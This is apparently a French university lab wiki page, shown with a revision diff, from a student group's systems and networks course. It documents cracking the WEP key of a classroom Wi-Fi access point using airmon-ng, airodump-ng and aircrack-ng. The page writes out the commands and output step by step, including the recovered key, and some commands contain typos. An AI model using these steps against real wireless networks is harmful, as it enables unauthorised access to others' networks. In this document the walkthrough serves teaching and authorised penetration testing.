TP sysres IMA2a5 2021/2022 G6 : Différence entre versions
Ligne 1 : | Ligne 1 : | ||
− | == ''' | + | == '''1. Tests d’intrusion''' == |
− | ''' | + | '''1.1 Cassage de clef WEP d’un point d’accès WiFi''' |
On branche tout d'abord le module USB Wi-Pi sur la machine. | On branche tout d'abord le module USB Wi-Pi sur la machine. |
Version du 29 novembre 2021 à 09:15
1. Tests d’intrusion
1.1 Cassage de clef WEP d’un point d’accès WiFi
On branche tout d'abord le module USB Wi-Pi sur la machine.
On installe ensuite le paquetage aircrack-ng :
apt-install aicrack-ng
On lit les interfaces disponibles grâce à la commande airmon-ng :
root@zabeth03:~# airmon-ng PHY Interface Driver Chipset phy2 wlx40a5ef0f68cb rt2800usb Ralink Technology, Corp. RT5370
On passe ensuite la carte Wi-Pi en mode moniteur, espion du réseau sans fil.
root@zabeth03:~# airmon-ng start wlx40a5ef0f68cb PHY Interface Driver Chipset phy2 wlx40a5ef0f68cb rt2800usb Ralink Technology, Corp. RT5370 Interface wlx40a5ef0f68cbmon is too long for linux so it will be renamed to the old style (wlan#) name. (mac80211 monitor mode vif enabled on [phy2]wlan0mon (mac80211 station mode vif disabled for [phy2]wlx40a5ef0f68cb)
Le nom a été changé car l'ancien était trop long, l'interface s'appelle maintenant wlan0mon.
On peut obtenir le canal et l'adresse MAC de la cracotte qui nous intéresse (ici, la cracotte13) grâce à la commande :
root@zabeth09:~# airmon-ng --encrypt wep wlan0mon BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 04:DA:D2:9C:50:5C -34 5 37 9 3 54e. WEP WEP cracotte13
On peut lire que la cracotte13 est sur le canal 3 et que son adresse MAC est 04:DA:D2:9C:50:5C.
On récupère ensuite dans un fichier "lcrack" toutes les données concernants la cracotte13 qui transitent sur le canal 3:
airodump-ng -w lcrack --channel 3 --bssid 04:DA:D2:9C:50:5C wlan0mon
On attend d'avoir un nombre suffisant de données (environ 40000 pour ma part) :
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 04:DA:D2:9C:50:5C -38 0 3776 40132 115 3 54e. WEP WEP cracotte13
On lance ensuite la commande permettant de craquer le mot de passe grâce aux données récupérées :
aircrack-ng lcrack.cap
On obtient rapidement la clé WEP :
Aircrack-ng 1.5.2 [00:00:00] Tested 829 keys (got 263651 IVs) KB depth byte(vote) 0 2/ 3 73(281856) D8(281088) 0E(278016) 7D(278016) DF(276736) 18(276480) 19(276480) 4F(276480) D7(275968) 5C(275712) 9D(275456) D2(275200) B8(274688) 4A(274432) 76(274432) 1 5/ 1 38(282368) 91(278784) DE(276992) 80(276736) E0(276736) 66(276480) 4C(275456) 89(275456) D9(275456) 98(275200) 53(274944) D7(274944) 39(274432) D3(274432) 1D(274176) 2 2/ 9 37(285696) 90(280832) CF(280064) FC(278272) 03(278016) 6E(278016) DE(278016) DB(277760) FD(277760) C2(277504) 60(276480) 62(276224) 73(275968) CB(275968) DA(275456) 3 0/ 1 14(373248) A1(285952) F7(284672) F4(284416) AE(283648) FC(281344) 5C(280832) F9(279552) 55(279040) 29(278528) 03(277248) 06(276736) 53(276480) 66(275456) B6(275456) 4 32/ 4 F3(273152) 12(272896) 9A(272896) 45(272640) E2(272640) 4E(272384) B4(272384) 65(271872) 23(271616) 89(271360) 1C(270848) 1F(270592) B9(270592) FC(270592) 06(270336) KEY FOUND! [ 12:34:56:78:9A:BC:14:CB:A9:87:65:43:21 ] Decrypted correctly: 100%